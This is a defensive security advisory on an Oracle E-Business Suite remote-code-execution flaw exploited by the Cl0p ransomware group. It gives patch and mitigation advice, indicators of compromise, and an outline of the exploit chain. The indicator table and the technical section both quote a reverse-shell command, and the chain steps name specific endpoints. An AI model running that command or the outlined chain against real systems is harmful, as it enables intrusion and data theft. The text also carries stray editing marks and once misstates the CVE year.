Executive Summary

    On October 4th, Oracle reported a critical zero-day vulnerability in Oracle E-Business Suite (EBS) that is under active exploitation by Cl0p ransomware operators. The vulnerability (tracked as CVE-2025-61882) is a critical unauthenticated remote code execution software vulnerability affecting Oracle EBS versions 12.2.3 through 12.2.14, with a CVSS score of 9.8.

    The flaw exists in the Oracle Concurrent Processing BI Publisher Integration component of Oracle EBS and if successfully exploited grants unauthenticated attackers remote code execution (RCE) on a target machine without requiring any credentials.

    Beazley Security strongly recommends organizations apply available patches for affected Oracle EBS systems and to immediately assess them for potential compromise, given reports of active exploitation by the Cl0p ransomware operators. Indicators of Compromise (IOCs) provided in this advisory can assist in identifying systems that may have been impacted.

    Additionally, the public leak of functional exploit code by Scattered Lapsus$ increases accessibility and likelihood other threat actors will begin using the exploit.

    Affected Systems or Products

    Oracle has released a security alert stating the following Oracle E-Business suite versions are impacted by this vulnerability. Please see the patches section of this document for more details.

    Product

    Affected

    Unaffected

    Oracle E-Business Suite

    12.2.3-12.2.14

    Later than 12.2.14

    Mitigations / Workarounds

    Given the active exploitation by Cl0p ransomware operators and public leak of exploit code by a well-known collective of threat actors, Beazley Security strongly recommends organizations apply these updates immediately. Oracle has released emergency patches to remediate this vulnerability, please see the “patches” section below for more information.

    If patching cannot be immediately applied, other mitigations may temporarily reduce the risk of exposure:

    • Restrict public network access to or consider temporary isolation of Oracle EBS systems, especially those using BI Publisher Integration modules due to the severity of this issue.

    • Deploy Web Application Firewalls (WAF) with signatures that detect exploitation attempts of this vulnerability

    • Monitor for indicators of attack or compromise. See the “Indicators of Compromise” section in this document for more information

    Please note that threat actors claim to have more sophisticated versions of this exploit that require less outbound connectivity from impacted systems. Organizations are strongly advised to apply available patches rather than attempt any temporary mitigations that may not fully address the issue.

    Patches

    Patches are available through Oracle’s Patch Availability Document (requires Oracle login) which provides step-by-step installation instructions tailored to each supported version.

    Before applying the patch for CVE-2025-61882, organizations must first ensure that the October 2023 Critical Patch Update (CPU) is installed. The earlier update is a mandatory prerequisite to apply fixes, according to Oracle’s security advisory.

    Indicators of Compromise

    The table below lists verified Indicators of Compromise tied to active exploitation attempts against Oracle EBS, released by Oracle. They include IP addresses and a command pattern that is consistent with reverse shell behavior as seen in the leaked proof of concept exploit.

    Indicator

    Type

    Description

    200[.]107[.]207[.]26

    IP

    Potential GET and POST activity

    185[.]181[.]60[.]11

    IP

    Potential GET and POST activity

    sh -c /bin/bash -i >& /dev/tcp/<callback IP>/<callback port> 0>&1[FD1] [BV2]

    Command

    Establish an outbound TCP connection (reverse shell style), hardcoded but replaceable RCE payload found in the PoC

    76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d

    SHA-256

    oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip

    aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121

    SHA-256

    oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py

    6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b

    SHA-256

    oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

    Threat Intelligence

    Cl0p Ransomware Campaign

    The Cl0p ransomware group has been actively exploiting CVE-2025-61882 as a zero-day vulnerability since August 2025, conducting a sophisticated data theft and extortion campaign targeting Oracle EBS clients. It is believed the group has been identifying vulnerable, internet facing systems and using the now released exploit to gain access to and exfiltrate data.

    Starting late September and into October, Cl0p started a widespread email extortion campaign, sending ransom demands through compromised, otherwise legitimate email accounts to increase delivery rates to victims according to Cybereason. The extortion emails purportedly direct victims to visit their public facing data leak site with the group claiming to have stolen ERP data including financial records, HR data, and other customer information.

    This campaign mirrors Cl0p’s action in previous high-profile attacks against file transfer solution MOVEit Transfer back in 2023, another campaign that exploited a zero-day vulnerability (CVE-2023-34362) on internet facing enterprise software.

    Technical Details

    CVE-2026-61882 is a critical remote code execution vulnerability that is exploitable without authentication. The flaw exists in Oracle E-Business Suite’s (EBS) concurrent processing product, affecting the BI Publisher Integration component according to the risk matrix provided in Oracle’s related advisory.

    This vulnerability is especially dangerous because attackers can exploit it remotely on internet-facing systems without authentication or user involvement.

    At the time of this writing, Oracle has not provided details about the flaws and specific exploitation of this vulnerability. However, according to an article released by Rapid7 the exploit was released to the public by the “SCATTERED LAPSUS$” and/or related threat actors, and analysis performed by researcher Johannes Ullrich suggests exploitation may be attributed to a Server-Side Request Forgery (SSRF) issue, following a multi-step process:

    • The exploit script sends a HTTP GET request to /OA_HTML/runforms.jsp to fingerprint the target system and verify the hostname.

    • A HTTP POST request to /OA_HTML/JavaScriptServlet retrieves a CSRF token required for the final exploit

    • The exploit request is contained in an HTTP POST to /OA_HTML/configurator/UiServlet

    • The exploit payload leverages an CLRF injection and an auth bypass to deliver the SSRF payload

    • The SSRF payload tricks the target machine into retrieving and executing arbitrary commands from an attacker-controlled server (labelled “evil_server” in the leaked PoC code)

    • The “evil_server” code in the leaked PoC contains the bash -i >& /dev/tcp/<IP>/<port> 0>&1 reverse shell, but this command can be replaced by anything

    Beazley Security Labs has acquired and is presently analyzing the Proof of Concept (PoC) exploit. If confirmed, findings consistent with the testing and reporting by Johannes Ullrich suggest that the probable attack vector for CVE-2025-61882 is as outlined below:

    BSL-A1136 Figure 1

    Figure 1: CVE-2025-61882 attack chain

    How Beazley Security is responding

    Beazley Security is monitoring client perimeter devices through our Exposure Management Platform to identify impacted devices and support organizations in remediation of any issues found.

    We are also conducting threat hunts across our MDR environment to detect potential exploitation attempts against our clients.

    If you believe your organization may have been impacted by this attack campaign and need support, please contact our Incident Response team.

    Sources